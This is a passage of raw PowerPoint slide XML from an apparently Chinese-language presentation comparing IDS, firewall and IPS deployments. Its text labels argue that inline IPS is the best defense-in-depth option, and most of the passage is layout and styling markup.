          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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③</a:t>
            </a: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阻断策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>（私有协议）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="105" name="Object 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F18D5595-F35C-0BBB-5001-1632B26D2AB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8393114" y="3657918"/>
          <a:ext cx="339725" cy="576262"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s5203" name="Visio" r:id="rId10" imgW="282245" imgH="445618" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId10" imgW="282245" imgH="445618" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="105" name="Object 85">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F18D5595-F35C-0BBB-5001-1632B26D2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114" y="3657918"/>
                        <a:ext cx="3397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7" name="组合 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C35084F-A50A-0974-ECC0-28EC9599CBBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="3749307" cy="720000"/>
            <a:chOff x="3792538" y="3138472"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="108" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0FCAEAE-B50F-070B-B561-7CF922EC0CD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3792538" y="3138472"/>
              <a:ext cx="1239837" cy="734063"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 11921"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="15000">
                  <a:srgbClr val="EEECE1">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EEECE1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="25400">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="00000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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99C1A2D1-60C9-6018-3026-F40427C3611E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3835380" y="3222715"/>
              <a:ext cx="711200" cy="56515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folHlink">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="folHlink">
                    <a:gamma/>
                    <a:tint val="48627"/>
                    <a:invGamma/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="0">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF1C6F8-299F-8962-F1DB-9C4478F7AB1C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860800" y="3293024"/>
              <a:ext cx="1109663" cy="46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003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IPS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的产生：用户需求</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11F158FC-E534-4E7B-A49A-ABC4B8859660}"/>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25969338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1C9EC92-E8DF-F978-C272-448B5F68303A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1812897" y="1820849"/>
            <a:ext cx="8579458" cy="4141681"/>
            <a:chOff x="2095500" y="2586649"/>
            <a:chExt cx="7297738" cy="3392118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB6E778-480A-35C1-FA10-921EFDD804FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3256081" y="5651069"/>
              <a:ext cx="4976088" cy="327698"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
              </a:sys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a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="CCE8CF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>IPS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="CCE8CF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>是深层防御的最优方案</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="61" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9047C9BF-8DF2-D4E8-3653-02BDF3263A46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="116" idx="3"/>
              <a:endCxn id="130" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4886325" y="3321663"/>
              <a:ext cx="2832100" cy="502081"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="62" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5DA1F4E-8752-C083-7766-5CE86AF80E3F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="63" idx="3"/>
              <a:endCxn id="127" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4872038" y="3858237"/>
              <a:ext cx="3009900" cy="512763"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="AutoShape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A8B0C8D-6D4E-28DD-3185-5BB0688A8ABA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4352925" y="4197962"/>
              <a:ext cx="533400" cy="346075"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDecision">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7FD13B"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="7FD13B">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Y</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14B5CA4D-1D9B-934B-BD19-0B0246436D53}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2095500" y="2586649"/>
              <a:ext cx="1727200" cy="1008062"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 8088"/>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65" name="AutoShape 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1455D305-C8C9-0058-AE32-48C4CA510FC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2745600" y="2691511"/>
              <a:ext cx="969812" cy="334670"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="00ADDC">
                    <a:shade val="51000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="80000">
                  <a:srgbClr val="00ADDC">
                    <a:shade val="93000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="00ADDC">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dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="CCE8CF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>旁路部署</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="AutoShape 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCBEC8DB-3117-15FB-4D20-9A991EE0CAAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2745600" y="3155209"/>
              <a:ext cx="969812" cy="334670"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="EA157A">
                    <a:shade val="51000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="80000">
                  <a:srgbClr val="EA157A">
                    <a:shade val="93000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EA157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dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="CCE8CF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>深层分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Text Box 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02D0FFF0-1843-4AE9-CC32-7EC5C30AA471}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2095500" y="2891449"/>
              <a:ext cx="615950" cy="302490"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="106" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19DD9197-C66B-E454-9B36-4FF6D8BFFFC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2095500" y="4097949"/>
              <a:ext cx="1727200" cy="1008062"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4924"/>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111" name="AutoShape 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FF92D90-9BA4-91F7-67A1-A460B8AE8F81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2745600" y="4204063"/>
              <a:ext cx="969812" cy="334670"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="1AB39F">
                    <a:shade val="51000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="80000">
                  <a:srgbClr val="1AB39F">
                    <a:shade val="93000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="1AB39F">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a:solidFill>
                    <a:sysClr val="window" lastClr="CCE8CF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>在线部署</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="112" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9C70284-A898-2E1C-905B-3B034BC7E0F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2745600" y="4666936"/>
              <a:ext cx="969812" cy="334670"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="FEB80A">
                    <a:shade val="51000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="80000">
                  <a:srgbClr val="FEB80A">
                    <a:shade val="93000"/>
                    <a:satMod val="130000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FEB80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dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="CCE8CF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>低层分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="113" name="Text Box 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED26557E-E5BF-6884-8DCB-E6643CF40B4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2095500" y="4402750"/>
              <a:ext cx="477506" cy="302490"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>FW</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="114" name="AutoShape 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C57BD966-789C-33EA-DEFC-0579B831EBC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4352925" y="4702787"/>
              <a:ext cx="533400" cy="346075"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDecision">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA157A"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="EA157A">
                  <a:shade val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>N</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="115" name="AutoShape 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9E36680-1F7B-79F3-1352-ED05A0C10CB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4352925" y="2685075"/>
              <a:ext cx="533400" cy="346075"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDecision">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA157A"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
